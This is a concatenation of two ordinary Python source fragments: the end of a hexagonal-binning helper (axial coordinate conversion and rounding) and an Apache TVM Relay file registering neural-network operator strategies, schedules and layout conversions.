useful to set this value to match the plot.
Returns:
(array[int], array[int])
'''
HEX_FLAT = [2.0/3.0, 0.0, -1.0/3.0, np.sqrt(3.0)/3.0]
HEX_POINTY = [np.sqrt(3.0)/3.0, -1.0/3.0, 0.0, 2.0/3.0]
coords = HEX_FLAT if orientation == 'flattop' else HEX_POINTY
x = x / size * (aspect_scale if orientation == "pointytop" else 1)
y = -y / size / (aspect_scale if orientation == "flattop" else 1)
q = coords[0] * x + coords[1] * y
r = coords[2] * x + coords[3] * y
return _round_hex(q, r)
def hexbin(x: Any, y: Any, size: float, orientation: str = "pointytop", aspect_scale: float = 1) -> Any:
''' Perform an equal-weight binning of data points into hexagonal tiles.
For more sophisticated use cases, e.g. weighted binning or scaling
individual tiles proportional to some other quantity, consider using
HoloViews.
Args:
x (array[float]) :
A NumPy array of x-coordinates for binning
y (array[float]) :
A NumPy array of y-coordinates for binning
size (float) :
The size of the hexagonal tiling.
The size is defined as the distance from the center of a hexagon
to the top corner for "pointytop" orientation, or from the center
to a side corner for "flattop" orientation.
orientation (str, optional) :
Whether the hex tile orientation should be "pointytop" or
"flattop". (default: "pointytop")
aspect_scale (float, optional) :
Match a plot's aspect ratio scaling.
When working with a plot with ``aspect_scale != 1``, this
parameter can be set to match the plot, in order to draw
regular hexagons (instead of "stretched" ones).
This is roughly equivalent to binning in "screen space", and
it may be better to use axis-aligned rectangular bins when
plot aspect scales are not one.
Returns:
DataFrame
The resulting DataFrame will have columns *q* and *r* that specify
hexagon tile locations in axial coordinates, and a column *counts* that
provides the count for each tile.
.. warning::
Hex binning only functions on linear scales, i.e. not on log plots.
'''
pd: Any = import_required('pandas','hexbin requires pandas to be installed')
q, r = cartesian_to_axial(x, y, size, orientation, aspect_scale=aspect_scale)
df = pd.DataFrame(dict(r=r, q=q))
return df.groupby(['q', 'r']).size().reset_index(name='counts')
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
def _round_hex(q: Any, r: Any) -> Tuple[Any, Any]:
''' Round floating point axial hex coordinates to integer *(q,r)*
coordinates.
This code was adapted from:
https://www.redblobgames.com/grids/hexagons/#rounding
Args:
q (array[float]) :
NumPy array of Floating point axial *q* coordinates to round
r (array[float]) :
NumPy array of Floating point axial *q* coordinates to round
Returns:
(array[int], array[int])
'''
x = q
z = r
y = -x-z
rx = np.round(x)
ry = np.round(y)
rz = np.round(z)
dx = np.abs(rx - x)
dy = np.abs(ry - y)
dz = np.abs(rz - z)
cond = (dx > dy) & (dx > dz)
q = np.where(cond , -(ry + rz), rx)
r = np.where(~cond & ~(dy > dz), -(rx + ry), rz)
return q.astype(int), r.astype(int)
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
|
the-stack_106_22059
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=no-else-return, invalid-name, unused-argument, too-many-arguments, consider-using-in
"""Backend compiler related feature registration"""
from __future__ import absolute_import
from tvm import topi
from tvm.topi.utils import get_const_tuple
from tvm.runtime import convert
from tvm.te.hybrid import script
from .. import op as reg
from .. import strategy
from ..op import OpPattern
from .._tensor import elemwise_shape_func
from ..strategy.generic import is_depthwise_conv2d
from ...transform import LayoutConfig
from ....ir import container
from ....tir import expr
# relu
reg.register_broadcast_schedule("nn.relu")
reg.register_pattern("nn.relu", OpPattern.ELEMWISE)
# softmax
reg.register_strategy("nn.softmax", strategy.softmax_strategy)
reg.register_pattern("nn.softmax", OpPattern.OPAQUE)
# fast softmax
reg.register_strategy("nn.fast_softmax", strategy.fast_softmax_strategy)
reg.register_pattern("nn.fast_softmax", OpPattern.OPAQUE)
# log_softmax
reg.register_schedule("nn.log_softmax", strategy.schedule_log_softmax)
reg.register_pattern("nn.log_softmax", OpPattern.OPAQUE)
@reg.register_legalize("nn.dense")
def legalize_dense(attrs, inputs, types):
"""Legalize dense op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
types : list of types
List of input and output types
Returns
-------
result : tvm.relay.Expr
The legalized expr
"""
return topi.nn.dense_legalize(attrs, inputs, types)
# dense
reg.register_strategy("nn.dense", strategy.dense_strategy)
reg.register_pattern("nn.dense", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_alter_op_layout("nn.dense")
def alter_op_layout_dense(attrs, inputs, tinfos, out_type):
"""Alternate the layout of dense"""
return topi.nn.dense_alter_layout(attrs, inputs, tinfos, out_type)
# dense_pack
reg.register_strategy("nn.contrib_dense_pack", strategy.dense_pack_strategy)
reg.register_pattern("nn.contrib_dense_pack", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
# fifo_buffer
@reg.register_compute("nn.fifo_buffer")
def compute_fifo_buffer(attrs, inputs, out_type):
return [topi.nn.fifo_buffer(inputs[0], inputs[1], axis=attrs.get_int("axis"))]
reg.register_injective_schedule("nn.fifo_buffer")
reg.register_pattern("nn.fifo_buffer", OpPattern.OPAQUE)
@reg.register_legalize("nn.batch_matmul")
def legalize_batch_matmul(attrs, inputs, types):
"""Legalize batch_matmul op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
types : list of types
List of input and output types
Returns
-------
result : tvm.relay.Expr
The legalized expr
"""
return topi.nn.batch_matmul_legalize(attrs, inputs, types)
# batch_matmul
reg.register_strategy("nn.batch_matmul", strategy.batch_matmul_strategy)
reg.register_pattern("nn.batch_matmul", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
# sparse_dense
@reg.register_compute("nn.sparse_dense")
def compute_sparse_dense(attrs, inputs, out_type):
"""Compute definition of sparse_dense"""
return [topi.nn.sparse_dense(inputs[0], inputs[1], inputs[2], inputs[3], attrs["sparse_lhs"])]
reg.register_strategy("nn.sparse_dense", strategy.sparse_dense_strategy)
reg.register_pattern("nn.sparse_dense", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_alter_op_layout("nn.sparse_dense")
def alter_op_layout_sparse_dense(attrs, inputs, tinfos, out_type):
"""Alternate the layout of sparse_dense"""
return topi.nn.sparse_dense_alter_layout(attrs, inputs, tinfos, out_type)
# sparse_add
reg.register_strategy("nn.sparse_add", strategy.sparse_add_strategy)
reg.register_pattern("nn.sparse_add", reg.OpPattern.OPAQUE)
@reg.register_compute("nn.internal.sparse_dense_padded")
def compute_sparse_dense_padded(attrs, inputs, out_type):
"""Compute definition of sparse_dense_padded"""
raise NotImplementedError("nn.internal.sparse_dense_padded is only available on cuda")
reg.register_strategy("nn.internal.sparse_dense_padded", strategy.sparse_dense_padded_strategy)
reg.register_pattern("nn.internal.sparse_dense_padded", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
# sparse_transpose
@reg.register_compute("nn.sparse_transpose")
def compute_sparse_transpose(attrs, inputs, out_type):
"""Compute definition of sparse_transpose"""
return topi.nn.sparse_transpose(inputs[0], inputs[1], inputs[2])
reg.register_schedule("nn.sparse_transpose", strategy.schedule_sparse_transpose)
reg.register_pattern("nn.sparse_transpose", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
# sparse_conv2d
@reg.register_compute("nn.sparse_conv2d")
def compute_sparse_conv2d(attrs, inputs, out_type):
"""Compute definition of sparse_conv2d"""
return [topi.nn.sparse_conv2d(inputs[0], inputs[1], inputs[2], inputs[3], attrs["layout"])]
reg.register_strategy("nn.sparse_conv2d", strategy.sparse_conv2d_strategy)
reg.register_pattern("nn.sparse_conv2d", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
# conv1d
reg.register_strategy("nn.conv1d", strategy.conv1d_strategy)
reg.register_pattern("nn.conv1d", OpPattern.OUT_ELEMWISE_FUSABLE)
# conv2d
reg.register_strategy("nn.conv2d", strategy.conv2d_strategy)
reg.register_pattern("nn.conv2d", OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_alter_op_layout("nn.conv2d")
def alter_op_layout_conv2d(attrs, inputs, tinfos, out_type):
"""Alternate the layout of conv2d"""
return topi.nn.conv2d_alter_layout(attrs, inputs, tinfos, out_type)
@reg.register_legalize("nn.conv2d")
def legalize_conv2d(attrs, inputs, types):
"""Legalize conv2d op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
types : list of types
List of input and output types
Returns
-------
result : tvm.relay.Expr
The legalized expr
"""
return topi.nn.conv2d_legalize(attrs, inputs, types)
@reg.register_convert_op_layout("nn.conv2d")
def convert_conv2d(attrs, inputs, tinfos, desired_layouts):
"""Convert Layout pass registration for conv2d op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
tinfos : list of types
List of input and output types
desired_layouts : list of layout strings
List of layouts defining our desired
layout for the data and kernel inputs respectively.
Returns
-------
result : tvm.relay.Expr
The transformed expr
"""
# pylint: disable=import-outside-toplevel
from tvm import relay
data, weight = inputs
# First check if there is a LayoutConfig scope, and if so, whether
# it indicates we should ignore this layer or not.
layout_config = LayoutConfig.current
if layout_config is not None:
skip_layer = layout_config.check_skip()
if skip_layer:
return relay.nn.conv2d(data, weight, **attrs)
# Prepare new layout.
new_attrs = dict(attrs)
assert len(desired_layouts) == 2, "A desired layout is expected for both of nn.conv2d's inputs"
desired_data_layout, desired_kernel_layout = map(str, desired_layouts)
assert desired_data_layout != "default", "Data layout cannot be default"
new_attrs["data_layout"] = desired_data_layout
if desired_kernel_layout != "default":
new_attrs["kernel_layout"] = desired_kernel_layout
return relay.nn.conv2d(data, weight, **new_attrs)
# Handle default kernel layouts
if desired_data_layout == "NCHW":
new_attrs["kernel_layout"] = "OIHW"
return relay.nn.conv2d(data, weight, **new_attrs)
elif desired_data_layout == "NHWC":
# Check for depthwise convolution.
data_info, weight_info = tinfos
if is_depthwise_conv2d(
data_info.shape,
attrs["data_layout"],
weight_info.shape,
attrs["kernel_layout"],
attrs["groups"],
):
new_attrs["kernel_layout"] = "HWOI"
else:
new_attrs["kernel_layout"] = "HWIO"
return relay.nn.conv2d(data, weight, **new_attrs)
elif desired_data_layout == "HWNC":
new_attrs["kernel_layout"] = "HWOI"
return relay.nn.conv2d(data, weight, **new_attrs)
raise ValueError("Layout %s is not yet supported." % desired_data_layout)
# conv2d_transpose
reg.register_strategy("nn.conv2d_transpose", strategy.conv2d_transpose_strategy)
reg.register_pattern("nn.conv2d_transpose", OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_legalize("nn.conv2d_transpose")
def legalize_conv2d_transpose(attrs, inputs, types):
"""Legalize conv2d_transpose op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current Transposed convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
types : list of types
List of input and output types
Returns
-------
result : tvm.relay.Expr
The legalized expr
"""
return topi.nn.conv2d_transpose_legalize(attrs, inputs, types)
@reg.register_convert_op_layout("nn.conv2d_transpose")
def convert_conv2d_transpose(attrs, inputs, tinfos, desired_layouts):
"""Convert Layout pass registration for conv2d_transpose op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
tinfos : list of types
List of input and output types
desired_layouts : list of layout strings
List of layouts defining our desired
layout for the data and kernel inputs respectively.
Returns
-------
result : tvm.relay.Expr
The transformed expr
"""
# pylint: disable=import-outside-toplevel
from tvm import relay
data, weight = inputs
new_attrs = dict(attrs)
assert len(desired_layouts) == 2, "A desired layout is expected for both of nn.conv2d's inputs"
desired_data_layout, desired_kernel_layout = map(str, desired_layouts)
assert desired_data_layout != "default", "Data layout cannot be default"
new_attrs["data_layout"] = desired_data_layout
if desired_kernel_layout != "default":
new_attrs["kernel_layout"] = desired_kernel_layout
return relay.nn.conv2d_transpose(data, weight, **new_attrs)
# Handle default kernel layouts
if desired_data_layout == "NCHW":
new_attrs["kernel_layout"] = "OIHW"
return relay.nn.conv2d_transpose(data, weight, **new_attrs)
elif desired_data_layout == "NHWC":
new_attrs["kernel_layout"] = "HWIO"
return relay.nn.conv2d_transpose(data, weight, **new_attrs)
raise ValueError("Layout %s is not yet supported." % desired_data_layout)
# conv3d_transpose
reg.register_strategy("nn.conv3d_transpose", strategy.conv3d_transpose_strategy)
reg.register_pattern("nn.conv3d_transpose", OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_legalize("nn.conv3d_transpose")
def legalize_conv3d_transpose(attrs, inputs, types):
"""Legalize conv3d_transpose op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current Transposed convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
types : list of types
List of input and output types
Returns
-------
result : tvm.relay.Expr
The legalized expr
"""
return topi.nn.conv3d_transpose_legalize(attrs, inputs, types)
# conv3d
reg.register_strategy("nn.conv3d", strategy.conv3d_strategy)
reg.register_pattern("nn.conv3d", OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_alter_op_layout("nn.conv3d")
def alter_op_layout_conv3d(attrs, inputs, tinfos, out_type):
"""Alternate the layout of conv3d"""
return topi.nn.conv3d_alter_layout(attrs, inputs, tinfos, out_type)
@reg.register_convert_op_layout("nn.conv3d")
def convert_conv3d(attrs, inputs, tinfos, desired_layouts):
"""Convert Layout pass registration for conv3d op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
tinfos : list of types
List of input and output types
desired_layouts : list of layout strings
List of layouts defining our desired
layout for the data and kernel inputs respectively.
Returns
-------
result : tvm.relay.Expr
The transformed expr
"""
# pylint: disable=import-outside-toplevel
from tvm import relay
data, weight = inputs
new_attrs = dict(attrs)
assert len(desired_layouts) == 2, "A desired layout is expected for both of nn.conv3d's inputs"
desired_data_layout, desired_kernel_layout = map(str, desired_layouts)
assert desired_data_layout != "default", "Data layout cannot be default"
new_attrs["data_layout"] = desired_data_layout
if desired_kernel_layout != "default":
new_attrs["kernel_layout"] = desired_kernel_layout
return relay.nn.conv3d(data, weight, **new_attrs)
# Handle default kernel layouts
if desired_data_layout == "NCDHW":
new_attrs["kernel_layout"] = "OIDHW"
return relay.nn.conv3d(data, weight, **new_attrs)
elif desired_data_layout == "NDHWC":
new_attrs["kernel_layout"] = "DHWIO"
return relay.nn.conv3d(data, weight, **new_attrs)
raise ValueError("Layout %s is not yet supported" % desired_data_layout)
# conv3d_winograd related operators
reg.register_strategy(
"nn.contrib_conv3d_winograd_without_weight_transform",
strategy.conv3d_winograd_without_weight_transfrom_strategy,
)
reg.register_pattern(
"nn.contrib_conv3d_winograd_without_weight_transform", OpPattern.OUT_ELEMWISE_FUSABLE
)
@reg.register_compute("nn.contrib_conv3d_winograd_weight_transform")
def compute_contrib_conv3d_winograd_weight_transform(attrs, inputs, out_dtype):
"""Compute definition of contrib_conv3d_winograd_weight_transform"""
out = topi.nn.conv3d_winograd_weight_transform(inputs[0], attrs.get_int("tile_size"))
return [out]
reg.register_schedule(
"nn.contrib_conv3d_winograd_weight_transform",
strategy.schedule_conv3d_winograd_weight_transform,
)
reg.register_pattern("nn.contrib_conv3d_winograd_weight_transform", OpPattern.OUT_ELEMWISE_FUSABLE)
# conv1d_transpose
reg.register_strategy("nn.conv1d_transpose", strategy.conv1d_transpose_strategy)
reg.register_pattern("nn.conv1d_transpose", OpPattern.OUT_ELEMWISE_FUSABLE)
# bias_add
reg.register_injective_schedule("nn.bias_add")
reg.register_pattern("nn.bias_add", OpPattern.BROADCAST)
# max_pool1d
reg.register_schedule("nn.max_pool1d", strategy.schedule_pool)
reg.register_pattern("nn.max_pool1d", OpPattern.OUT_ELEMWISE_FUSABLE)
# max_pool2d
reg.register_schedule("nn.max_pool2d", strategy.schedule_pool)
reg.register_pattern("nn.max_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# max_pool3d
reg.register_schedule("nn.max_pool3d", strategy.schedule_pool)
reg.register_pattern("nn.max_pool3d", OpPattern.OUT_ELEMWISE_FUSABLE)
# avg_pool1d
reg.register_schedule("nn.avg_pool1d", strategy.schedule_pool)
reg.register_pattern("nn.avg_pool1d", OpPattern.OUT_ELEMWISE_FUSABLE)
# avg_pool2d
reg.register_schedule("nn.avg_pool2d", strategy.schedule_pool)
reg.register_pattern("nn.avg_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# avg_pool3d
reg.register_schedule("nn.avg_pool3d", strategy.schedule_pool)
reg.register_pattern("nn.avg_pool3d", OpPattern.OUT_ELEMWISE_FUSABLE)
# max_pool2d_grad
reg.register_schedule("nn.max_pool2d_grad", strategy.schedule_pool_grad)
reg.register_pattern("nn.max_pool2d_grad", OpPattern.OUT_ELEMWISE_FUSABLE)
# avg_pool2d_grad
reg.register_schedule("nn.avg_pool2d_grad", strategy.schedule_pool_grad)
reg.register_pattern("nn.avg_pool2d_grad", OpPattern.OUT_ELEMWISE_FUSABLE)
# adaptive_max_pool1d
reg.register_schedule("nn.adaptive_max_pool1d", strategy.schedule_adaptive_pool)
reg.register_pattern("nn.adaptive_max_pool1d", OpPattern.OUT_ELEMWISE_FUSABLE)
# adaptive_avg_pool1d
reg.register_schedule("nn.adaptive_avg_pool1d", strategy.schedule_adaptive_pool)
reg.register_pattern("nn.adaptive_avg_pool1d", OpPattern.OUT_ELEMWISE_FUSABLE)
# global_max_pool2d
reg.register_schedule("nn.global_max_pool2d", strategy.schedule_adaptive_pool)
reg.register_pattern("nn.global_max_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# global_avg_pool2d
reg.register_schedule("nn.global_avg_pool2d", strategy.schedule_adaptive_pool)
reg.register_pattern("nn.global_avg_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# adaptive_max_pool2d
reg.register_schedule("nn.adaptive_max_pool2d", strategy.schedule_adaptive_pool)
reg.register_pattern("nn.adaptive_max_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# adaptive_avg_pool2d
reg.register_schedule("nn.adaptive_avg_pool2d", strategy.schedule_adaptive_pool)
reg.register_pattern("nn.adaptive_avg_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# adaptive_max_pool3d
reg.register_schedule("nn.adaptive_max_pool3d", strategy.schedule_adaptive_pool)
reg.register_pattern("nn.adaptive_max_pool3d", OpPattern.OUT_ELEMWISE_FUSABLE)
# adaptive_avg_pool3d
reg.register_schedule("nn.adaptive_avg_pool3d", strategy.schedule_adaptive_pool)
reg.register_pattern("nn.adaptive_avg_pool3d", OpPattern.OUT_ELEMWISE_FUSABLE)
# leaky_relu
reg.register_broadcast_schedule("nn.leaky_relu")
reg.register_pattern("nn.leaky_relu", OpPattern.ELEMWISE)
# prelu
reg.register_broadcast_schedule("nn.prelu")
reg.register_pattern("nn.prelu", OpPattern.BROADCAST)
# flatten
reg.register_broadcast_schedule("nn.batch_flatten")
reg.register_pattern("nn.batch_flatten", OpPattern.INJECTIVE)
# lrn
@reg.register_compute("nn.lrn")
def compute_lrn(attrs, inputs, out_dtype):
"""Compute definition of lrn"""
assert len(inputs) == 1
return [topi.nn.lrn(inputs[0], attrs.size, attrs.axis, attrs.alpha, attrs.beta, attrs.bias)]
reg.register_schedule("nn.lrn", strategy.schedule_lrn)
reg.register_pattern("nn.lrn", OpPattern.OPAQUE)
# upsampling
@reg.register_compute("nn.upsampling")
def compute_upsampling(attrs, inputs, out_dtype):
scale_h = attrs.scale_h
scale_w = attrs.scale_w
layout = attrs.layout
method = attrs.method
align_corners = attrs.align_corners
return [topi.nn.upsampling(inputs[0], scale_h, scale_w, layout, method, align_corners)]
reg.register_injective_schedule("nn.upsampling")
# upsampling3d
@reg.register_compute("nn.upsampling3d")
def compute_upsampling3d(attrs, inputs, out_dtype):
scale_d = attrs.scale_d
scale_h = attrs.scale_h
scale_w = attrs.scale_w
layout = attrs.layout
method = attrs.method
coordinate_transformation_mode = attrs.coordinate_transformation_mode
return [
topi.nn.upsampling3d(
inputs[0], scale_d, scale_h, scale_w, layout, method, coordinate_transformation_mode
)
]
reg.register_injective_schedule("nn.upsampling3d")
# pad
reg.register_broadcast_schedule("nn.pad")
# mirror_pad
@reg.register_compute("nn.mirror_pad")
def compute_mirror_pad(attrs, inputs, out_dtype):
pad_before, pad_after = list(zip(*attrs.pad_width))
mode = attrs.mode
out = topi.nn.mirror_pad(inputs[0], pad_before=pad_before, pad_after=pad_after, mode=mode)
return [out]
reg.register_broadcast_schedule("nn.mirror_pad")
@script
def _mirror_pad_func(data_shape, pad_width):
out = output_tensor((data_shape.shape[0],), "int64")
for i in const_range(data_shape.shape[0]):
out[i] = data_shape[i] + int64(pad_width[i][0]) + int64(pad_width[i][1])
return out
@reg.register_shape_func("nn.mirror_pad", False)
def mirror_pad_func(attrs, inputs, _):
pad_width_tuple = [get_const_tuple(p) for p in attrs.pad_width]
return [_mirror_pad_func(inputs[0], convert(pad_width_tuple))]
# conv2d_winograd related operators
reg.register_strategy(
"nn.contrib_conv2d_winograd_without_weight_transform",
strategy.conv2d_winograd_without_weight_transfrom_strategy,
)
reg.register_pattern(
"nn.contrib_conv2d_winograd_without_weight_transform", OpPattern.OUT_ELEMWISE_FUSABLE
)
# conv2d_gemm related operators
reg.register_strategy(
"nn.contrib_conv2d_gemm_without_weight_transform",
strategy.conv2d_gemm_without_weight_transform_strategy,
)
reg.register_pattern(
"nn.contrib_conv2d_gemm_without_weight_transform", OpPattern.OUT_ELEMWISE_FUSABLE
)
@reg.register_compute("nn.contrib_conv2d_gemm_weight_transform")
def compute_contrib_conv2d_gemm_weight_transform(attrs, inputs, out_dtype):
"""Compute definition of contrib_conv2d_gemm_weight_transform"""
out = topi.nn.conv2d_gemm_weight_transform(inputs[0], attrs.tile_rows, attrs.tile_cols)
return [out]
reg.register_schedule(
"nn.contrib_conv2d_gemm_weight_transform", strategy.schedule_conv2d_gemm_weight_transform
)
reg.register_pattern("nn.contrib_conv2d_gemm_weight_transform", OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_compute("nn.contrib_conv2d_winograd_weight_transform")
def compute_contrib_conv2d_winograd_weight_transform(attrs, inputs, out_dtype):
"""Compute definition of contrib_conv2d_winograd_weight_transform"""
out = topi.nn.conv2d_winograd_weight_transform(inputs[0], attrs.get_int("tile_size"))
return [out]
reg.register_schedule(
"nn.contrib_conv2d_winograd_weight_transform",
strategy.schedule_conv2d_winograd_weight_transform,
)
reg.register_pattern("nn.contrib_conv2d_winograd_weight_transform", OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_compute("nn.contrib_conv2d_winograd_nnpack_weight_transform")
def compute_contrib_conv2d_winograd_nnpack_weight_transform(attrs, inputs, out_dtype):
"""Compute definition of contrib_conv2d_winograd_nnpack_weight_transform"""
convolution_algorithm = attrs.get_int("convolution_algorithm")
out = topi.nn.conv2d_winograd_nnpack_weight_transform(
inputs[0], convolution_algorithm, out_dtype
)
return [out]
reg.register_schedule(
"nn.contrib_conv2d_winograd_nnpack_weight_transform",
strategy.schedule_conv2d_winograd_nnpack_weight_transform,
)
reg.register_pattern("nn.contrib_conv2d_winograd_nnpack_weight_transform", OpPattern.OPAQUE)
# conv2d_NCHWc
reg.register_strategy("nn.contrib_conv2d_NCHWc", strategy.conv2d_NCHWc_strategy)
reg.register_pattern("nn.contrib_conv2d_NCHWc", OpPattern.OUT_ELEMWISE_FUSABLE)
# depthwise_conv2d_NCHWc
reg.register_strategy("nn.contrib_depthwise_conv2d_NCHWc", strategy.depthwise_conv2d_NCHWc_strategy)
reg.register_pattern("nn.contrib_depthwise_conv2d_NCHWc", OpPattern.OUT_ELEMWISE_FUSABLE)
# deformable_conv2d
reg.register_strategy("nn.deformable_conv2d", strategy.deformable_conv2d_strategy)
reg.register_pattern("nn.deformable_conv2d", OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_alter_op_layout("nn.deformable_conv2d")
def alter_op_layout_deformable_conv2d(attrs, inputs, tinfos, out_type):
"""Alternate the layout of deformable conv2d"""
return None
@reg.register_legalize("nn.deformable_conv2d")
def legalize_deformable_conv2d(attrs, inputs, types):
"""Legalize deformable conv2d op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
types : list of types
List of input and output types
Returns
-------
result : tvm.relay.Expr
The legalized expr
"""
return None
@reg.register_convert_op_layout("nn.deformable_conv2d")
def convert_deformable_conv2d(attrs, inputs, tinfos, desired_layouts):
"""Convert Layout pass registration for deformable conv2d op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
tinfos : list of types
List of input and output types
desired_layouts : list of layout strings
List of layouts defining our desired
layout for the data and kernel inputs respectively.
Returns
-------
result : tvm.relay.Expr
The transformed expr
"""
# pylint: disable=import-outside-toplevel
from tvm import relay
data, offset, weight = inputs
new_attrs = dict(attrs)
for attr in new_attrs:
if isinstance(new_attrs[attr], container.Array):
new_attrs[attr] = list(new_attrs[attr])
elif isinstance(new_attrs[attr], expr.IntImm):
new_attrs[attr] = new_attrs[attr].value
# First check if there is a LayoutConfig scope, and if so, whether
# it indicates we should ignore this layer or not.
layout_config = LayoutConfig.current
if layout_config is not None:
skip_layer = layout_config.check_skip()
if skip_layer:
return relay.nn.deformable_conv2d(data, offset, weight, **new_attrs)
# Prepare new layout.
assert len(desired_layouts) == 2, "A desired layout is expected for data and kernel"
desired_data_layout, desired_kernel_layout = map(str, desired_layouts)
assert desired_data_layout != "default", "Data layout cannot be default"
new_attrs["data_layout"] = desired_data_layout
if desired_kernel_layout != "default":
new_attrs["kernel_layout"] = desired_kernel_layout
return relay.nn.deformable_conv2d(data, offset, weight, **new_attrs)
# Handle default kernel layouts
if desired_data_layout == "NCHW":
new_attrs["kernel_layout"] = "OIHW"
elif desired_data_layout == "NHWC":
new_attrs["kernel_layout"] = "HWIO"
else:
raise ValueError("Layout %s is not yet supported." % desired_data_layout)
return relay.nn.deformable_conv2d(data, offset, weight, **new_attrs)
# bitpack
@reg.register_compute("nn.bitpack")
def compute_bitpack(attrs, inputs, out_dtype):
"""Compute definition for bitpack"""
bits = attrs.bits
pack_axis = attrs.pack_axis
bit_axis = attrs.bit_axis
pack_type = attrs.pack_type
name = attrs.name
out = topi.nn.bitpack(inputs[0], bits, pack_axis, bit_axis, pack_type, name)
return [out]
reg.register_schedule("nn.bitpack", strategy.schedule_bitpack)
reg.register_pattern("nn.bitpack", OpPattern.INJECTIVE)
# bitserial_conv2d
reg.register_strategy("nn.bitserial_conv2d", strategy.bitserial_conv2d_strategy)
reg.register_pattern("nn.bitserial_conv2d", OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_legalize("nn.bitserial_conv2d")
def legalize_bitserial_conv2d(attrs, inputs, types):
"""Legalize bitserial_conv2d op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
types : list of types
List of input and output types
Returns
-------
result : tvm.relay.Expr
The legalized expr
"""
return topi.nn.bitserial_conv2d_legalize(attrs, inputs, types)
# bitserial_dense
reg.register_strategy("nn.bitserial_dense", strategy.bitserial_dense_strategy)
reg.register_pattern("nn.bitserial_dense", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
# cross_entropy
@reg.register_compute("nn.cross_entropy")
def compute_cross_entropy(attrs, inputs, out_dtype):
x, y = inputs
return [-topi.sum(topi.log(x) * y) / x.shape[0]]
reg.register_reduce_schedule("nn.cross_entropy")
reg.register_pattern("nn.cross_entropy", OpPattern.OPAQUE)
# dilate
@reg.register_compute("nn.dilate")
def compute_dilate(attrs, inputs, out_dtype):
return [topi.nn.dilate(inputs[0], attrs.strides, attrs.dilation_value)]
reg.register_broadcast_schedule("nn.dilate")
reg.register_pattern("nn.dilate", OpPattern.INJECTIVE)
# cross_entropy_with_logits
@reg.register_compute("nn.cross_entropy_with_logits")
def compute_cross_entropy_with_logits(attrs, inputs, out_dtype):
x, y = inputs
return [-topi.sum(x * y) / x.shape[0]]
reg.register_reduce_schedule("nn.cross_entropy_with_logits")
reg.register_pattern("nn.cross_entropy_with_logits", OpPattern.OPAQUE)
# nll_loss
@reg.register_compute("nn.nll_loss")
def compute_nll_loss(attrs, inputs, out_dtype):
predictions, targets, weights = inputs
return [topi.nn.nll_loss(predictions, targets, weights, attrs.reduction, attrs.ignore_index)]
reg.register_reduce_schedule("nn.nll_loss")
reg.register_pattern("nn.nll_loss", OpPattern.OUT_ELEMWISE_FUSABLE)
# depth_to_space
@reg.register_compute("nn.depth_to_space")
def compute_depth_to_space(attrs, inputs, out_dtype):
block_size = attrs.block_size
layout = attrs.layout
mode = attrs.mode
return [topi.nn.depth_to_space(inputs[0], block_size, layout=layout, mode=mode)]
reg.register_injective_schedule("nn.depth_to_space")
reg.register_pattern("nn.depth_to_space", OpPattern.INJECTIVE)
# space_to_depth
@reg.register_compute("nn.space_to_depth")
def compute_space_to_depth(attrs, inputs, out_dtype):
block_size = attrs.block_size
layout = attrs.layout
return [topi.nn.space_to_depth(inputs[0], block_size, layout=layout)]
reg.register_injective_schedule("nn.space_to_depth")
